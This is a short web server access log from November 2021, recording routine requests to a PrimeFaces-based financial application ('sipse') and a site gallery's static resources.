190.102.124.99 - - [21/Nov/2021:07:00:20 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 29529
190.102.124.99 - - [21/Nov/2021:07:00:24 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 120652
190.102.124.99 - - [21/Nov/2021:07:00:25 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:07:00:25 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:07:00:25 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:07:00:25 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:07:00:25 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:07:00:25 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:07:00:25 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:07:00:26 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
190.102.124.99 - - [21/Nov/2021:07:00:33 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 46042
190.102.124.99 - - [21/Nov/2021:07:00:33 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:07:00:33 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:07:00:33 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:07:00:33 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:07:00:33 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:07:00:34 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:07:00:34 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.233.240 - - [21/Nov/2021:07:00:54 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
216.245.221.92 - - [21/Nov/2021:07:02:31 -0500] "HEAD / HTTP/1.1" 200 -
23.100.232.233 - - [21/Nov/2021:07:02:48 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
23.100.232.233 - - [21/Nov/2021:07:02:48 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
